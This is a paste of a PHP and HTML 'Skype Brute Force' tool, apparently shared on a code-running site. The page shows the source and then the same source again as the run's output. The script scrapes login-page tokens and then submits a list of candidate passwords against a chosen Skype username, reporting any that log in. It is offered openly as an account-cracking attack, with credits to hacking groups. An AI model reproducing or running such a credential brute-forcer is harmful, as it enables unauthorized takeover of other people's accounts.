fork download
  1. <form method='POST'>
  2. <title>Skype Brute Force 2013 By xSecurity</title>
  3. <center>
  4. <img src='http://w...content-available-to-author-only...y.com/wp-content/uploads/2012/11/Skype-icon.png'><br>
  5. <input type='text' name='skypename' placeholder='Skype Name' size='38'><br>
  6. <textarea rows='16' cols='38' name='passwords' placeholder='passwords'></textarea><br>
  7. <input type='submit' value='Start Brute' name='brute'><br>
  8. </center>
  9. </form>
  10. <?
  11. # Brute Force Skype PHP Version
  12. # Coded By : xSecurity
  13. # Greets To : (( Sec4ever.CoM )) - (( x3 Group )) - (( is-sec.CoM ))
  14.  
  15.  
  16. $skype = "https://l...content-available-to-author-only...e.com/login?application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin";
  17. # Username & Password
  18. $username = $_POST['skypename'];
  19. $password = explode("\r\n", $_POST['passwords']);
  20.  
  21. # time zone
  22. $time = date_default_timezone_set("Asia/Riyadh");
  23. $date = date('H:i:s'); //Returns IST
  24.  
  25. # header
  26. $header = "HTTP/1.1 302";
  27.  
  28. # Fucntion Detalis
  29. function xsecurity($skype)
  30. {
  31. $ch = curl_init();
  32. curl_setopt($ch, CURLOPT_URL, $skype);
  33. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  34. curl_setopt($ch, CURLOPT_HEADER, 1);
  35. curl_setopt($ch, CURLOPT_POST, 1);
  36. curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  37. curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  38. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  39. $run = curl_exec($ch);
  40. preg_match('/<input type="hidden" name="session_token" value="(.*?)"/', $run, $hash);
  41. preg_match('/<input type="hidden" name="pie" id="pie" value="(.*?)"/', $run, $piie);
  42. preg_match('/<input type="hidden" name="etm" id="etm" value="(.*?)"/', $run, $etmm);
  43. return $hash[1]."|:|".$piie[1]."|:|".$etmm[1];
  44. }
  45.  
  46. # Explode Detalis
  47. $xsec = explode("|:|" ,xsecurity($skype));
  48. $token = $xsec[0];
  49. $pie = $xsec[1];
  50. $etm = $xsec[2];
  51.  
  52. # Function Brute
  53. function brute($skype,$username,$pass,$header)
  54. {
  55. $ch = curl_init();
  56. curl_setopt($ch, CURLOPT_URL, $skype);
  57. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  58. curl_setopt($ch, CURLOPT_HEADER, 1);
  59. curl_setopt($ch, CURLOPT_POST, 1);
  60. curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$username}&password={$pass}&timezone_field=%2B03%7C00&pie={$pie}&etm={$etm}&js_time={$date}&session_token={$token}&application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin");
  61. curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  62. curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  63. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  64. $brute = curl_exec($ch);
  65. if(strstr($brute, $header))
  66. {
  67. echo "<font face='Tahoma' size='2'><center>[+] Password Cracked is <b>{$pass}</b> --> <b>{$username}</b></font></center>";
  68. }
  69. return $brute;
  70. }
  71. if($_POST['brute'])
  72. {
  73. foreach($password as $pass)
  74. {
  75. brute($skype,$username,$pass,$header);
  76. }
  77. }
  78. echo "<center><br><font face='Tahoma' size='5' color='red'>Coded By : xSecurity --> Sec4ever.CoM</font></center>";
  79. ?>
Success #stdin #stdout 0.01s 82560KB
stdin
Standard input is empty
stdout
<form method='POST'>
<title>Skype Brute Force 2013 By xSecurity</title>
<center>
<img src='http://w...content-available-to-author-only...y.com/wp-content/uploads/2012/11/Skype-icon.png'><br>
<input type='text' name='skypename' placeholder='Skype Name' size='38'><br>
<textarea rows='16' cols='38' name='passwords' placeholder='passwords'></textarea><br>
<input type='submit' value='Start Brute' name='brute'><br>
</center>
</form>
<?
	@set_time_limit(0);
	# Brute Force Skype PHP Version 
	# Coded By : xSecurity
	# Greets To : (( Sec4ever.CoM )) - (( x3 Group )) - (( is-sec.CoM ))
	
	
	$skype = "https://l...content-available-to-author-only...e.com/login?application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin";
	# Username & Password
	$username = $_POST['skypename'];
	$password = explode("\r\n", $_POST['passwords']);
	
	# time zone 
    $time = date_default_timezone_set("Asia/Riyadh");
	$date = date('H:i:s'); //Returns IST 
	
	# header 
	$header = "HTTP/1.1 302";
	
	# Fucntion Detalis
	function xsecurity($skype)
	{
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $skype);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
		curl_setopt($ch, CURLOPT_HEADER, 1);
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
		curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		$run = curl_exec($ch);
		preg_match('/<input type="hidden" name="session_token" value="(.*?)"/', $run, $hash);
		preg_match('/<input type="hidden" name="pie" id="pie" value="(.*?)"/', $run, $piie);
		preg_match('/<input type="hidden" name="etm" id="etm" value="(.*?)"/', $run, $etmm);
		return $hash[1]."|:|".$piie[1]."|:|".$etmm[1];
	}
	
	# Explode Detalis 
	$xsec = explode("|:|" ,xsecurity($skype));
	$token = $xsec[0];
	$pie = $xsec[1];
	$etm = $xsec[2];
	
	# Function Brute
	function brute($skype,$username,$pass,$header)
	{
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $skype);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
		curl_setopt($ch, CURLOPT_HEADER, 1);
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$username}&password={$pass}&timezone_field=%2B03%7C00&pie={$pie}&etm={$etm}&js_time={$date}&session_token={$token}&application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin");
		curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
		curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		$brute = curl_exec($ch);
		if(strstr($brute, $header))
		{
			echo "<font face='Tahoma' size='2'><center>[+] Password Cracked is <b>{$pass}</b> --> <b>{$username}</b></font></center>";
		}
		return $brute;
	}
	if($_POST['brute'])
	{
		foreach($password as $pass)
		{
			brute($skype,$username,$pass,$header);
		}
	}
	echo "<center><br><font face='Tahoma' size='5' color='red'>Coded By : xSecurity --> Sec4ever.CoM</font></center>";
?>